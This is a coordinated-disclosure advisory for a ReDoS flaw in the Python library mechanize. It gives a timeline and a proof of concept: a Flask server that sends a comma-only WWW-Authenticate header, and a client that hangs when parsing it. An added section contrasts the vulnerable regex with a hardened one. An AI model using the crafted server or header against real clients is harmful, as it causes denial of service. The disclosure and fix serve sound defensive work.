Coordinated Disclosure Timeline
- 2021-08-31: Created issue asking for contact details.
- 2021-08-31: They added a security policy and closed the issue. I sent the report to email@example.com
- 2021-08-31: Issue is fixed by @kovidgoyal.
- 2021-08-31: Emailed firstname.lastname@example.org to ask if there will be a new release of mechanize and whether there will be an advisory.
- 2021-09-01: Reply from email@example.com: “New version released”
mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
ReDoS, or Regular Expression Denial of Service, is a vulnerability in inefficient regular expressions that can take extremely long to run (through catastrophic backtracking) when given a crafted input string.
The vulnerable regular expression is here.
mechanize is a library for automatically interacting with HTTP web servers. If the webserver responds in a malicious way, then mechanize could crash.
The reproduction steps below first start a webserver, and then starts
You can try to delete the `resp.headers[...` line to see how mechanize should behave.
- Install mechanize and flask:

```shell
pip3 install mechanize flask
```

- Run the server below with

```python
from flask import Flask, make_response

app = Flask(__name__)


@app.route("/")
def home():
    # Respond with a 401 whose WWW-Authenticate header is a run of commas:
    # this is the crafted value that makes mechanize's header parsing hang.
    resp = make_response("401 Unauthorized")
    resp.status_code = 401
    resp.headers["www-authenticate"] = ",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"
    return resp


if __name__ == "__main__":
    app.run(debug=True, port=8080)
```
- Leave the above server running while doing the next steps.
- Run the below with

```python
import mechanize

br = mechanize.Browser()
# Credentials are needed so that mechanize tries to answer the 401 challenge
# and therefore parses the crafted WWW-Authenticate header.
br.add_password("http://localhost:8080", "admin", "password")
br.open("http://localhost:8080")  # never returns on a vulnerable mechanize
```
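To show why the comma-only header in the reproduction above is dangerous and what a fix looks like, here is an added example (not code from the advisory or from mechanize). It assumes mechanize's regex is the urllib2 AbstractBasicAuthHandler pattern its fork inherited; `VULNERABLE_RX`, `HARDENED_RX` (the replacement CPython's urllib later adopted), `parse_challenge` and `time_match` are names introduced here.

```python
import re
import time

# Assumed: the urllib2-style pattern that mechanize's urllib2 fork inherited
# (mechanize's actual regex is the one linked in the advisory, not copied here).
# The nested quantifier `(?:.*,)*` is the problem: on a header made only of
# commas, with no `realm=` to satisfy the tail, the engine retries every way
# of splitting the commas before giving up, which is exponential in the count.
VULNERABLE_RX = re.compile(r'(?:.*,)*[ \t]*([^ \t]+)[ \t]+realm=(["\']?)([^"\']*)\2', re.I)

# Hardened form, as adopted by CPython's urllib: anchor each challenge to the
# start of the header or a preceding comma and forbid commas inside the scheme.
# No nested quantifier, so matching stays linear in the header length.
HARDENED_RX = re.compile(r'(?:^|,)[ \t]*([^ \t,]+)[ \t]+realm=(["\']?)([^"\']*)\2', re.I)


def parse_challenge(header: str, rx=HARDENED_RX):
    """Return (scheme, realm) from a WWW-Authenticate header, or None."""
    m = rx.search(header)
    if m is None:
        return None
    return m.group(1), m.group(3)


def time_match(rx, header: str) -> float:
    """Seconds spent matching `rx` against `header` (for the demo only)."""
    start = time.perf_counter()
    rx.search(header)
    return time.perf_counter() - start


if __name__ == "__main__":
    # A benign challenge: both patterns agree on the result.
    print(parse_challenge('Basic realm="wally world"', VULNERABLE_RX))
    print(parse_challenge('Basic realm="wally world"'))
    # Same shape of input as the advisory's server, but short enough to finish:
    # each extra comma roughly doubles the vulnerable pattern's running time,
    # while the hardened pattern stays flat. The advisory's 41 commas would
    # keep the vulnerable pattern busy for hours.
    for n in (10, 12, 14):
        header = "," * n
        print("%d commas: vulnerable %.4fs, hardened %.6fs"
              % (n, time_match(VULNERABLE_RX, header), time_match(HARDENED_RX, header)))
```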
This issue may lead to a denial of service.
You can contact the GHSL team at firstname.lastname@example.org; please include a reference to GHSL-2021-108 in any communication regarding this issue.